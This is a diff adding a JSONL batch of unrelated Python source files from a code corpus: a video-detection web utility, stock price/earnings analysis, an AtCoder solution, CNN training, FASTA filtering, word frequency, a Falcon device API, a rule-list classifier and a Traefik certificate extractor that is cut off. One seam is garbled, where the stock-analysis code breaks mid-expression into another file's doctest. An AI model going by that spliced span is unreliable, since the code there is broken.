diff --git "a/4486.jsonl" "b/4486.jsonl" new file mode 100644--- /dev/null +++ "b/4486.jsonl" @@ -0,0 +1,657 @@ +{"seq_id":"21701584","text":"import time\nimport json\nimport cv2\nimport os\nfrom app.framework import QD_Process\nimport psutil\nimport torch\nimport sys\nimport signal\nimport warnings\nimport logging\nfrom multiprocessing import Queue,Process\n\ndef generate_response(code,app_name,video_url,error_string='',succeed=0,pid=None):\n if pid is None:\n return {'succeed':succeed,'app_name':app_name,'error_code':code,\n 'video_url':video_url,'error_string':error_string}\n else:\n return {'succeed':succeed,'app_name':app_name,'error_code':code,\n 'video_url':video_url,'error_string':error_string,'pid':pid}\n\ndef get_data(request,name):\n if request.method == 'POST':\n value=request.form[name]\n elif request.method == 'GET':\n value=request.args.get(name)\n else:\n return False,None\n\n return True,value\n\ndef detection(data):\n with open('config.json','r') as f:\n config=json.load(f)\n\n config['video_url']=data['video_url']\n config['task_name']=data['task_name']\n\n try:\n logging.info('parse others {}'.format(data['others']))\n others=json.loads(data['others'])\n for key,value in others.items():\n config['others'][key]=value\n logging.info('update others {}'.format(others))\n except:\n logging.warn('bad others format {}'.format(data['others']))\n\n try:\n pid=psutil.Process().pid\n config['redis_key']=str(pid)\n p=QD_Process(config)\n p.process()\n except Exception as e:\n raise Exception('cannot start task because {}'.format(e.__str__()))\n\n return 0\n\ndef detection_demo(data):\n def write_to_queue(config,q):\n worker=QD_Process(config)\n while True:\n try:\n flag,frame=worker.reader.read_from_queue()\n if flag:\n image,bbox=worker.detector.process(frame)\n if q.qsize()<3:\n q.put(image)\n else:\n q.get()\n q.put(image)\n else:\n q.put(None)\n break\n except Exception as e:\n q.put(None)\n raise Exception('cannot start demo because {}'.format(e.__str__()))\n break\n\n if data['task_name']:\n with open('config.json','r') as f:\n config=json.load(f)\n\n config['video_url']=data['video_url']\n config['task_name']=data['task_name']\n\n try:\n others=json.loads(data['others'])\n for key,value in others.items():\n config['others'][key]=value\n logging.info('update others {}'.format(others))\n except:\n logging.warn('bad others format {}'.format(data['others']))\n\n try:\n queue=Queue()\n pid=psutil.Process().pid\n config['redis_key']=str(pid)\n sub_process=Process(target=write_to_queue,args=(config,queue))\n sub_process.start()\n\n while True:\n image=queue.get()\n if image is not None:\n yield image\n else:\n logging.warn('terminate subprocess')\n sub_process.terminate()\n logging.warn('join subprocess')\n sub_process.join()\n logging.warn('raise exception')\n raise StopIteration('not image offered')\n\n except Exception as e:\n raise Exception('cannot start task because {}'.format(e.__str__()))\n else:\n raise Exception('no such task name')\n\ndef kill_all_subprocess(root_pid=None):\n \"\"\"\n kill all child process for root_pid\n if root_pid is not None:\n kill root_pid\n \"\"\"\n\n def kill_group(pid):\n \"\"\"\n kill pid and it's child\n \"\"\"\n p=psutil.Process(pid)\n childs=p.children()\n for c in childs:\n kill_group(c.pid)\n\n p.kill()\n\n p = psutil.Process(root_pid)\n childs=p.children()\n for c in childs:\n if c.status=='zombie':\n logging.info('wait zombie pid={}'.format(c.pid))\n pid,status=os.waitpid(c.pid,os.WNOHANG)\n else:\n kill_group(c.pid)\n\n if root_pid is 
None:\n if p.children():\n logging.info('wait pid={}'.format(p.pid))\n os.wait()\n logging.info('wait pid={}'.format(p.pid))\n else:\n p.kill()\n logging.info('wait pid={}'.format(p.pid))\n os.wait()\n logging.info('wait pid={}'.format(p.pid))\n torch.cuda.empty_cache()","sub_path":"web_utils.py","file_name":"web_utils.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"619948925","text":"import pandas as pd\nimport sqlite3\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport plotly\nimport plotly.graph_objs as go\nimport datetime as dt\nimport time as tt\n\nfrom stocks.tools import get_datetime, convert_sql_date_to_datetime_date\n\n \nclass fundamentals:\n def __init__(self):\n pass\n\n def _get_keyratios(self):\n # load the entries for the current stock from the database\n cnx = sqlite3.connect('database/stocks_keyratios.db')\n sql = pd.read_sql_query(\"SELECT * FROM fundamentals WHERE ISIN = '{0}';\".format(self.isin), cnx)\n cnx.close() \n sql = sql.sort_values(by='year',ascending=False)\n sql = sql.reset_index(drop=True)\n \n self.keyratios = sql\n \n def _get_pe_for_year(self, pe_year, month=4, day=1, detailed=False):\n '''Get the price/earnings ratio for every day of the subsequent year'''\n # get the min/max date for selecting the quotes\n mindate = dt.date(pe_year+1, month, day) \n maxdate = dt.date(pe_year+2, month, day)\n\n # get the eps for the year under consideration\n eps = self.keyratios[self.keyratios.year==pe_year]['EarningsPerShare'].values[0]\n \n if eps is None:\n return None\n\n # extract the quote \n quote = self.quote[(self.quote.date>mindate) & (self.quote.date>> judge(0)\n 'Bad'\n >>> judge(59)\n 'Bad'\n >>> judge(60)\n 'Good'\n >>> judge(89)\n 'Good'\n >>> judge(90)\n 'Great'\n >>> judge(99)\n 'Great'\n >>> judge(100)\n 'Perfect'\n \"\"\"\n if score <= 59:\n return 'Bad'\n elif score <= 89:\n return 'Good'\n elif score <= 99:\n return 'Great'\n else:\n return 'Perfect'\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n solve()\n","sub_path":"atcoder/ABC/ABC028/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"360190071","text":"import os\nfrom scipy.misc import imresize\nfrom optimizer import *\nfrom PIL import Image\nimport pickle\nimport random\nfrom sklearn.model_selection import train_test_split\nfrom conv_net import DeepConvNet\nfrom trainer import Trainer\n\nsave_file = '/dataset.pkl'\n\n\ndef cutout(image_origin, mask_size):\n image = np.copy(image_origin)\n image = image.transpose(1, 2, 0)\n mask_value = image.mean()\n\n h, w, _ = image.shape\n\n top = np.random.randint(0 - mask_size // 2, h - mask_size)\n left = np.random.randint(0 - mask_size // 2, w - mask_size)\n bottom = top + mask_size\n right = left + mask_size\n\n if top < 0:\n top = 0\n if left < 0:\n left = 0\n\n image[top:bottom, left:right, :].fill(mask_value)\n return image.transpose(2, 0, 1)\n\n\ndef scale_augmentation(image, scale_range=(256, 400), crop_size=227):\n scale_size = np.random.randint(*scale_range)\n image = imresize(image, (scale_size, scale_size))\n image = random_crop(image, (crop_size, crop_size))\n\n return image.transpose(2, 0, 1) # 軸の入れ替え.\n\n\ndef random_crop(image, crop_size=(227, 227)):\n h, w, _ = image.shape\n top = np.random.randint(0, h - crop_size[0])\n left = np.random.randint(0, w - crop_size[1])\n bottom = top + 
crop_size[0]\n right = left + crop_size[1]\n\n image = image[top:bottom, left:right, :]\n return image\n\n\ndef load_images(dir, max):\n filenames = [os.getcwd() + dir + '/' + filename\n for filename in os.listdir(os.getcwd() + dir)\n if not filename.startswith('.')] # そういうとこやぞ!Mac!!(.DB_Store対策)\n images = []\n\n for filename in filenames:\n try:\n print(filename)\n image = np.array(Image.open(filename), dtype=np.float32)\n\n if len(image.shape) < 3:\n continue\n if image.shape[2] != 3:\n continue\n\n image = scale_augmentation(image)\n images.append(image)\n except:\n print('LoadError')\n\n # Data augmentation.\n if len(images) < max:\n sample = random.choices(images, k=(max - len(images)))\n for img in sample:\n img = cutout(img, 110)\n images.append(img)\n\n # debug.\n print(len(images))\n\n return images\n\n\ndef _change_one_hot_label(X):\n T = np.zeros((X.size, 3))\n for idx, row in enumerate(T):\n row[X[idx]] = 1\n\n return T\n\n\ndef init_dataset():\n dataset = {}\n\n dog_list = np.concatenate(load_images('/dog', 3000), axis=0)\n cat_list = np.concatenate(load_images('/cat', 3000), axis=0)\n person_list = np.concatenate(load_images('/person', 3000), axis=0)\n\n # debug.\n print(dog_list.shape)\n print(cat_list.shape)\n print(person_list.shape)\n\n X = np.concatenate([dog_list, cat_list, person_list], axis=0)\n X = X.reshape(-1, 3, 227, 227)\n\n t = np.concatenate([np.zeros(int(dog_list.shape[0] / 3)),\n np.ones(int(cat_list.shape[0] / 3)),\n np.full(int(person_list.shape[0] / 3), 2)],\n axis=0)\n\n # データセットをシャッフル.\n for l in [X, t]:\n np.random.seed(1)\n np.random.shuffle(l)\n\n dataset['img'] = X\n dataset['label'] = t\n\n with open(os.getcwd() + save_file, 'wb') as f:\n pickle.dump(dataset, f, -1)\n print('Done')\n\n\ndef load_dataset(normalize=True, one_hot_label=False):\n if not os.path.exists(os.getcwd() + save_file):\n print('Initializing')\n init_dataset()\n\n with open(os.getcwd() + save_file, 'rb') as f:\n dataset = pickle.load(f)\n\n # 正規化.\n if normalize:\n dataset['img'] = dataset['img'].astype(np.float32)\n dataset['img'] /= 255.0\n\n # 必要があればワンホットベクトルに変換.\n if one_hot_label:\n dataset['label'] = _change_one_hot_label(dataset['label'])\n\n dataset['label'] = dataset['label'].astype(np.int64)\n print(len(dataset['label']))\n\n # (訓練画像, 訓練ラベル), (テスト画像, テストラベル)に分ける.\n return train_test_split(dataset['img'], dataset['label'], test_size=0.3)\n\n\n# データセット読み込み.\nX_train, X_test, t_train, t_test = load_dataset()\n\nnetwork = DeepConvNet()\ntrainer = Trainer(network, X_train, t_train, X_test, t_test,\n epochs=50, mini_batch_size=100,\n optimizer='Adam', optimizer_param={'lr': 0.001},\n evaluate_sample_num_per_epoch=1000)\nprint('training start.')\ntrainer.train()\n\nnetwork.save_params('deep_convnet_params.pkl')\nprint('All done !!')\n","sub_path":"train_conv.py","file_name":"train_conv.py","file_ext":"py","file_size_in_byte":4592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"61667658","text":"#!/usr/bin/env python\n\nimport argparse\nimport re\nimport sys\nfrom Bio import SeqIO\n\nparser = argparse.ArgumentParser(description=\"Search for pattern in fasta header and return sequences whose header includes (or does not include) the match\")\n\nparser.add_argument('--fasta', required=True, help='input fasta file', action='store')\nparser.add_argument('--pattern', required=True, help='pattern to match in header', action='store')\nparser.add_argument('--complement', required=False, default=False, help='Select only sequences 
that do not match the pattern', action='store_true')\n\nargs=parser.parse_args()\n\n# read in sequences\nrecords = list(SeqIO.parse(args.fasta, \"fasta\"))\n\n# create empty lists\nfound_sequences = []\nmissing_sequences = []\n\n# If --complement is provided, return sequences that do not match the search string. Otherwise return matches.\n\nfor record in records:\n\n if re.search(args.pattern, record.description):\n found_sequences.append(record)\n else:\n missing_sequences.append(record)\n\n# If search pattern is not found in any header, print error message only\n# If search pattern is found, print sequences that match (or do not match, if --complement argument is provided) to screen\n\nif args.complement:\n if len(missing_sequences) == len(records):\n print(\"ERROR: Could not find \" + args.pattern + \" in any fasta header!\", file=sys.stderr)\n else:\n print(\"Writing out %i sequences that DO NOT match the search string!\" % len(missing_sequences), file=sys.stderr)\n SeqIO.write(missing_sequences, sys.stdout, \"fasta\")\nelse:\n print(\"Writing out %i sequences that match the search string!\" % len(found_sequences), file=sys.stderr)\n SeqIO.write(found_sequences, sys.stdout, \"fasta\")\n\n","sub_path":"scripts/split_fasta_by_header_pattern.py","file_name":"split_fasta_by_header_pattern.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"457701212","text":"import re\nimport sys\nfrom collections import Counter\n\nTOP_COUNT = 10\n\n\ndef load_data(filepath):\n text = ''\n with open(filepath, 'r') as infile:\n text = infile.read()\n return text\n\n\ndef get_most_frequent_words(text):\n text = text.lower()\n # Removing special symbols\n text = re.sub('\\W+', ' ', text)\n words = list(filter(None, text.split(' ')))\n c = Counter(words).most_common()\n return list(map(lambda x_y: (x_y[0], x_y[1] / len(words)), c))\n\n\nif __name__ == '__main__':\n filepath = sys.argv[1]\n for word, frequency in get_most_frequent_words(load_data(filepath))[:TOP_COUNT]:\n print('{} - {}'.format(word, frequency))\n","sub_path":"lang_frequency.py","file_name":"lang_frequency.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"561140644","text":"import falcon\r\nimport subprocess\r\n\r\nfrom bot_python_sdk.action_service import ActionService\r\nfrom bot_python_sdk.configuration_service import ConfigurationService\r\nfrom bot_python_sdk.configuration_store import ConfigurationStore\r\nfrom bot_python_sdk.device_status import DeviceStatus\r\nfrom bot_python_sdk.logger import Logger\r\n\r\nLOCATION = 'Controller'\r\nINCOMING_REQUEST = 'Incoming request: '\r\n\r\nDEVICE_ID_KEY = 'deviceId'\r\nMAKER_ID_KEY = 'makerId'\r\nPUBLIC_KEY_KEY = 'publicKey'\r\n\r\nACTION_ID = 'actionID'\r\nVALUE_KEY = 'value'\r\n\r\nMETHOD_GET = 'GET'\r\nMETHOD_POST = 'POST'\r\nACTIONS_ENDPOINT = '/actions'\r\nPAIRING_ENDPOINT = '/pairing'\r\n\r\n\"\"\" Error Text \"\"\"\r\nERROR_TRIGGER = 'Not allowed to trigger actions when device is not activated.'\r\nERROR_PAIRED = 'Device is already paired.'\r\nERROR_ACTION_ID = 'Missing parameter `' + ACTION_ID + '` for ' + METHOD_POST + ' ' + ACTIONS_ENDPOINT\r\n\r\n\r\nclass BaseUtilHandler:\r\n def __init__(self):\r\n self.configuration_store = ConfigurationStore()\r\n\r\n @staticmethod\r\n def call_error_logger(error, has_desc):\r\n Logger.error(LOCATION, error)\r\n if has_desc:\r\n raise 
falcon.HTTPForbidden(description=error)\r\n else:\r\n raise falcon.HTTPBadRequest\r\n\r\n @staticmethod\r\n def call_info_logger(call_type, endpoint):\r\n Logger.info(LOCATION, INCOMING_REQUEST + call_type + ' ' + endpoint)\r\n\r\n def check_device_status(self, config_status, expected_status, pair):\r\n if config_status is not expected_status:\r\n self.call_error_logger(ERROR_PAIRED, True) if pair else self.call_error_logger(ERROR_TRIGGER, True)\r\n\r\n\r\nclass ActionsResource(BaseUtilHandler):\r\n def __init__(self):\r\n self.action_service = ActionService()\r\n super().__init__(self)\r\n\r\n def on_get(self, request, response):\r\n self.call_info_logger(METHOD_GET, ACTIONS_ENDPOINT)\r\n response.media = self.action_service.get_actions()\r\n\r\n def on_post(self, request, response):\r\n configuration = self.configuration_store.get()\r\n self.check_device_status(configuration.get_device_status(), DeviceStatus.ACTIVE, False)\r\n self.call_info_logger(METHOD_POST, ACTIONS_ENDPOINT)\r\n\r\n data = request.media\r\n if ACTION_ID not in data.keys():\r\n self.call_error_logger(ERROR_ACTION_ID, False)\r\n\r\n action_id = data[ACTION_ID]\r\n value = data[VALUE_KEY] if VALUE_KEY in data.keys() else None\r\n success = self.action_service.trigger(action_id, value)\r\n if success:\r\n response.media = {'message': 'Action triggered'}\r\n else:\r\n raise falcon.HTTPServiceUnavailable\r\n\r\n\r\nclass PairingResource(BaseUtilHandler):\r\n\r\n def on_get(self, request, response):\r\n self.call_info_logger(METHOD_GET, PAIRING_ENDPOINT)\r\n configuration = self.configuration_store.get()\r\n self.check_device_status(configuration.get_device_status(), DeviceStatus.NEW, True)\r\n response.media = configuration.get_device_information\r\n subprocess.Popen(['make', 'pair'])\r\n\r\n\r\napi = application = falcon.API()\r\napi.add_route(ACTIONS_ENDPOINT, ActionsResource())\r\napi.add_route(PAIRING_ENDPOINT, PairingResource())\r\nConfigurationService().resume_configuration()\r\n","sub_path":"bot_python_sdk/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"354939195","text":"import pandas as pd\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom scipy import stats \r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom itertools import cycle\r\nfrom sklearn.metrics import roc_curve, auc\r\nfrom sklearn.preprocessing import label_binarize\r\nfrom sklearn.multiclass import OneVsRestClassifier\r\nfrom scipy import interp\r\n\r\n# Cleaning Energy data for Office Jolie PrimClass_Jaylin\r\ndata = pd.read_csv('E:\\Thesis\\Dataset\\Working Directory\\E2015.csv')\r\ndata = data[['Year','timestamp','PrimClass_Javier']]\r\n# Renaming columns\r\ndata.columns = ['Year','timestamp','Energy consumption']\r\n\r\n# Cleaning Weather data.\r\ndf = pd.read_csv('E:\\Thesis\\Dataset\\Working Directory\\w1.csv')\r\ndf.head()\r\ndf.describe()\r\ndata1 = df.iloc[0:16016,0:18]\r\ndata1[['Hour','Minutes']] = data1.Time.str.split(\":\", expand= True)\r\ndata1[['Date','Time']] = data1.Timestamp.str.split(\" \", expand= True)\r\ndata1 = data1[data1.Minutes!= '20']\r\ndata1 = data1.reset_index()\r\ndata1.drop(columns={'index','DateUTC
','Timestamp.1','Minutes'}, axis=1, inplace = True)\r\ndata = pd.concat([data,data1], sort = True, axis=1)\r\n\r\n\r\n#Counting number of NA in dataframe\r\ndata.isnull().sum()\r\ndata.notnull().sum()\r\n\r\n# Removing the NA values from dataframe\r\ndata.drop(columns={'Events','TimeBST','TimeGMT','Precipitationmm','Gust SpeedKm/h','Time'}, axis=1, inplace=True)\r\ndata.rename(columns = {'Dew PointC':'Dew_PointC','Sea Level PressurehPa':'Sea_Level_PressurehPa','Wind Direction':'Wind_Direction','Wind SpeedKm/h':'Wind_Speed_in_KMperHour','Energy consumption':'Energy_consumption'}, inplace=True)\r\ndata.isnull().sum()\r\n\r\n\r\n# Data Cleaning \r\n#Coding Wind Speed into numeric values.\r\ndata['Wind_Speed_in_KMperHour'].replace('Calm','0',inplace=True)\r\ndata.Wind_Speed_in_KMperHour = pd.to_numeric(data.Wind_Speed_in_KMperHour,errors='coerce')\r\ndata['Hour']=data.Hour.astype('float64')\r\ndata.dtypes\r\n \r\n\r\n# Encoding for catagorical data\r\n\r\ndata.Conditions.unique()\r\ndata['Conditions'].replace('Drizzle','Rain',inplace=True)\r\ndata['Conditions'].replace('Fog','Rain',inplace=True)\r\ndata['Conditions'].replace('Light Rain','Rain',inplace=True)\r\ndata['Conditions'].replace('Heavy Rain','Rain',inplace=True)\r\ndata['Conditions'].replace('Drizzle','Rain',inplace=True)\r\ndata['Conditions'].replace('Light Drizzle','Rain',inplace=True)\r\ndata['Conditions'].replace('Fog','Rain',inplace=True)\r\ndata['Conditions'].replace('Rain Showers','Rain',inplace=True)\r\ndata['Conditions'].replace('Light Snow','Rain',inplace=True)\r\ndata['Conditions'].replace('Thunderstorms and Rain','Rain',inplace=True)\r\ndata['Conditions'].replace('Heavy Thunderstorms with Small Hail','Rain',inplace=True)\r\ndata['Conditions'].replace('Haze','Rain',inplace=True)\r\ndata['Conditions'].replace('Mist','Rain',inplace=True)\r\ndata['Conditions'].replace('Heavy Drizzle','Rain',inplace=True)\r\ndata['Conditions'].replace('Heavy Rain Showers','Rain',inplace=True)\r\ndata['Conditions'].replace('Light Rain Showers','Rain',inplace=True)\r\ndata['Conditions'].replace('Shallow Fog','Rain',inplace=True)\r\ndata['Conditions'].replace('Thunderstorm','Rain',inplace=True)\r\ndata['Conditions'].replace('Patches of Fog','Rain',inplace=True)\r\n\r\ndata['Wind_Direction'] = data['Wind_Direction'].replace(['SW', 'SSW','WSW'], 'SW')\r\ndata['Wind_Direction'] = data['Wind_Direction'].replace(['SSE', 'ESE'], 'SE')\r\ndata['Wind_Direction'] = data['Wind_Direction'].replace(['WSW'], 'SW')\r\ndata['Wind_Direction'] = data['Wind_Direction'].replace(['Variable'], 'Calm')\r\ndata['Wind_Direction'] = data['Wind_Direction'].replace(['NNW','WNW'], 'NW')\r\ndata['Wind_Direction'] = data['Wind_Direction'].replace(['ENE','NNE'], 'Calm')\r\ndata.Conditions.unique()\r\ndata.Wind_Direction.unique()\r\n\r\n# Removing dummy variables \r\ndata = data[data.VisibilityKm != -9999]\r\ndata = data.reset_index(drop = True)\r\ndata = data.drop(columns={'Year','timestamp','Timestamp','Date'})\r\n\r\n\r\n# Plotting the classes of dependent variable\r\nplt.figure(figsize=(8, 6))\r\nsns.countplot('Conditions', data=data)\r\nplt.title('Balanced Classes')\r\nplt.show()\r\n\r\n\r\n# Plotting the classes of dependent variable\r\nplt.figure(figsize=(8, 6))\r\nsns.countplot('Wind_Direction', data=data)\r\nplt.title('Balanced Classes')\r\nplt.show()\r\n\r\nplotdata = data\r\n\r\n# Label encoding of dependent variables\r\n\r\nfrom sklearn.preprocessing import LabelEncoder\r\nbin_cols = data.nunique()[data.nunique() <= 9].keys().tolist()\r\nle = LabelEncoder()\r\nfor i 
in bin_cols :\r\n data[i] = le.fit_transform(data[i])\r\n\r\n\r\nbin_cols = data.nunique()[data.nunique() <= 9].keys().tolist()\r\nle = LabelEncoder()\r\nfor i in bin_cols :\r\n data[i] = le.fit_transform(data[i])\r\ndata.Wind_Direction.unique()\r\n\r\n\r\n# Exploratory Data Analysis.\r\n\r\n# Co-Relation Plot 1 \r\n \r\ndef heatmap(x, y, size):\r\n fig, ax = plt.subplots()\r\n \r\n # Mapping from column names to integer coordinates\r\n x_labels = [v for v in sorted(x.unique())]\r\n y_labels = [v for v in sorted(y.unique())]\r\n x_to_num = {p[1]:p[0] for p in enumerate(x_labels)} \r\n y_to_num = {p[1]:p[0] for p in enumerate(y_labels)} \r\n \r\n size_scale = 500\r\n ax.scatter(\r\n x=x.map(x_to_num), \r\n y=y.map(y_to_num), \r\n s=size * size_scale, \r\n marker='s' \r\n )\r\n # Show column labels on the axes\r\n ax.set_xticks([x_to_num[v] for v in x_labels])\r\n ax.set_xticklabels(x_labels, rotation=45, horizontalalignment='right')\r\n ax.set_yticks([y_to_num[v] for v in y_labels])\r\n ax.set_yticklabels(y_labels)\r\n \r\ncolumns = ['Energy_consumption', 'Dew_PointC','TemperatureC', 'Humidity', 'Sea_Level_PressurehPa', 'VisibilityKm','Wind_Speed_in_KMperHour','WindDirDegrees','Hour'] \r\ncorr = data[columns].corr()\r\ncorr = pd.melt(corr.reset_index(), id_vars='index') # Unpivot the dataframe, so we can get pair of arrays for x and y\r\ncorr.columns = ['x', 'y', 'value']\r\nheatmap(\r\n x=corr['x'],\r\n y=corr['y'],\r\n size=corr['value'].abs()\r\n) \r\n\r\n# Co-Relation Plot 2\r\n\r\nf, ax = plt.subplots(figsize=(10, 8))\r\ncorr = data.corr()\r\nsns.heatmap(corr, mask=np.zeros_like(corr, dtype=np.bool), cmap=sns.diverging_palette(220, 10, as_cmap=True),\r\n square=True, ax=ax)\r\n\r\n\r\n\r\n# Box plots\r\n# Run for each variable separately\r\n\r\nsns.boxplot(data=data.VisibilityKm)\r\nsns.boxplot(data=data.TemperatureC)\r\nsns.boxplot(data=data.Dew_PointC)\r\nsns.boxplot(data=data.Humidity)\r\nsns.boxplot(data=data.Sea_Level_PressurehPa)\r\nsns.boxplot(data=data.WindDirDegrees)\r\nsns.boxplot(data=data.Energy_consumption)\r\nsns.boxplot(data=data.Wind_Speed_in_KMperHour)\r\n\r\n\r\n\r\n# Variable Distribution plots\r\n# Run for each variable separately\r\n\r\nplot = plotdata.iloc[:,1]\r\nsns.distplot(plot);\r\nplot = plotdata.iloc[:,2]\r\nsns.distplot(plot, hist=False, rug=True);\r\nplot = plotdata.iloc[:,3]\r\nsns.kdeplot(plot, shade=True);\r\nplot = plotdata.iloc[:,4]\r\nsns.distplot(plot, kde=False, fit=stats.gamma);\r\nplot = plotdata.iloc[:,5]\r\nsns.distplot(plot, kde=False, fit=stats.gamma);\r\nplot = plotdata.iloc[:,6]\r\nsns.kdeplot(plot, shade=True);\r\nplot = plotdata.iloc[:,7]\r\nsns.kdeplot(plot, shade=True);\r\nplot = plotdata.iloc[:,8]\r\nsns.kdeplot(plot, shade=True);\r\nplot = plotdata.iloc[:,9]\r\nsns.kdeplot(plot, shade=True);\r\nplot = plotdata.iloc[:,10]\r\nsns.kdeplot(plot, shade=True);\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"PreprocessingW1.py","file_name":"PreprocessingW1.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"555420002","text":"'''\nCreated on 07 Nov 2018\n\n@author: danhbuithi\n'''\nimport heapq\nimport numpy as np\nfrom rule_based_classifiers.RuleListClassifier import RuleListClassifier,\\\n SingleRuleBasedClassifier\n\n\nclass CBA(object):\n '''\n classdocs\n '''\n\n\n def __init__(self):\n '''\n Constructor\n '''\n \n '''\n Create a heap to keep rules which are candidates for classifier.\n Each element is a tuple consisting of confidence, support 
and rule.\n '''\n def _createQueue(self, rule_list):\n Q = []\n for x in rule_list:\n heapq.heappush(Q, (-x['ins'], -x['sup'], len(x['r'].left_items), x['r'])) \n return Q\n \n '''\n Build classifier (a list of rules) by pruning rules\n '''\n def fit(self, train_data, rule_list, labels):\n selected_rules = []\n Q = self._createQueue(rule_list)\n remove_markers = np.zeros(train_data.size())\n \n error_by_rules = 0.0\n indices = np.where(remove_markers == 0)[0]\n while Q and len(indices) > 0:\n \n rule_tuple = heapq.heappop(Q)\n rule = rule_tuple[-1]\n \n \n is_marked = False\n local_error_by_rule = 0.0\n \n '''\n Find transactions satisfy the rule\n '''\n satisified_indices = []\n for i in indices:\n d = train_data.get_transaction(i)\n if rule.is_satisfied(d):\n satisified_indices.append(i)\n if train_data.data_labels[i] in rule.right_items:\n is_marked = True\n else:\n local_error_by_rule += 1\n '''\n If there's at least a transaction be classified correctly, then choose the rule\n '''\n if is_marked == False: continue\n \n error_by_rules += local_error_by_rule\n for i in satisified_indices:\n remove_markers[i] = 1 \n \n '''\n Update un-classified sample list\n '''\n indices = np.where(remove_markers == 0)[0]\n \n \n '''\n Select default class in the case this rule is the last rule in selection.\n '''\n default_class_count = 0\n default_class_name = None \n if len(indices) > 0:\n default_class_name, default_class_count = RuleListClassifier.localDefaultClass(train_data, indices)\n \n \n '''\n Add rule and its probability into the selected list\n '''\n adding_rule = ({'r':rule, 'ins':-rule_tuple[0], 'sup':-rule_tuple[1]}, \n {'r': default_class_name, 'ins': 1.0}, \n default_class_count + error_by_rules)\n selected_rules.append(adding_rule)\n \n '''\n Finalize the selected rules --> create model.\n '''\n p = selected_rules.index(min(selected_rules, key = lambda x: x[2]))\n model = [x[0] for x in selected_rules[:p+1]]\n default_class = selected_rules[p][1]\n \n '''\n If the selected rules cover whole data set, then choose the majority class as default class.\n ''' \n if (default_class['r'] is None):\n temp_default_class, _ = RuleListClassifier.globalDefaultClass(train_data)\n default_class = {'r':temp_default_class, 'ins': 1.0}\n \n return SingleRuleBasedClassifier(model, labels, default_class)\n \n ","sub_path":"rule_based_classifiers/CBA.py","file_name":"CBA.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"182423873","text":"import sys\nimport os\nimport errno\nimport time\nimport json\nimport logging\nfrom base64 import b64decode\n\nimport pem\nfrom OpenSSL import crypto\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\ndef extract_certificates_from_acme(acme_file):\n # Read JSON file\n data = json.loads(open(acme_file).read())\n certs = data['Certificates']\n\n # Loop over all certificates\n for c in certs:\n # Decode private key, certificate and chain\n privatekey = b64decode(c['Key']).decode('utf-8')\n fullchain = b64decode(c['Certificate']).decode('utf-8')\n start = fullchain.find('-----BEGIN CERTIFICATE-----', 1)\n cert = fullchain[0:start]\n chain = fullchain[start:]\n\n # Create PKCS#12 certificate archive\n pkcs12 = crypto.PKCS12()\n pkcs12.set_privatekey(crypto.load_privatekey(crypto.FILETYPE_PEM, privatekey))\n pkcs12.set_certificate(crypto.load_certificate(crypto.FILETYPE_PEM, cert))\n ca_certs = 
[crypto.load_certificate(crypto.FILETYPE_PEM, c.as_bytes()) for c in pem.parse(bytes(chain, encoding='utf-8'))]\n pkcs12.set_ca_certificates(ca_certs)\n pfx = pkcs12.export()\n\n # Create domain directory if it doesn't exist\n directory = 'certs/' + c['Domain']['Main'] + '/'\n try:\n os.makedirs(directory)\n except OSError as error:\n if error.errno != errno.EEXIST:\n raise\n\n # Write private key, certificate and chain to file\n with open(directory + 'privkey.pem', 'w') as f:\n f.write(privatekey)\n with open(directory + 'cert.pem', 'w') as f:\n f.write(cert)\n with open(directory + 'chain.pem', 'w') as f:\n f.write(chain)\n with open(directory + 'fullchain.pem', 'w') as f:\n f.write(fullchain)\n with open(directory + 'cert.pfx', 'wb') as f:\n f.write(pfx)\n\n # Write private key, certificate and chain to flat files\n directory = 'certs_flat/'\n\n with open(directory + c['Domain']['Main'] + '.key', 'w') as f:\n f.write(privatekey)\n with open(directory + c['Domain'] ['Main']+ '.crt', 'w') as f:\n f.write(fullchain)\n with open(directory + c['Domain']['Main'] + '.chain.pem', 'w') as f:\n f.write(chain)\n with open(directory + c['Domain']['Main'] + '.pfx', 'wb') as f:\n f.write(pfx)\n\n if c['Domain']['SANs']:\n for name in c['Domain']['SANs']:\n with open(directory + name + '.key', 'w') as f:\n f.write(privatekey)\n with open(directory + name + '.crt', 'w') as f:\n f.write(fullchain)\n with open(directory + name + '.chain.pem', 'w') as f:\n f.write(chain)\n with open(directory + name + '.pfx', 'wb') as f:\n f.write(pfx)\n\n print('Extracted certificate for: ' + c['Domain']['Main'] + (', ' + ', '.join(c['Domain']['SANs']) if c['Domain']['SANs'] else ''))\n\n\nclass AcmeFileHandler(FileSystemEventHandler):\n def on_created(self, event):\n self.handle(event)\n\n def on_modified(self, event):\n self.handle(event)\n\n def handle(self, event):\n # Check if it's a JSON file\n if not event.is_directory and event.src_path.endswith('acme.json'):\n logging.info('Certificates changed')\n extract_certificates_from_acme(event.src_path)\n\nif __name__ == \"__main__\":\n # Determine path to watch\n path = sys.argv[1] if len(sys.argv) > 1 else './data'\n\n # Create output directories if it doesn't exist\n try:\n os.makedirs('certs')\n except OSError as error:\n if error.errno != 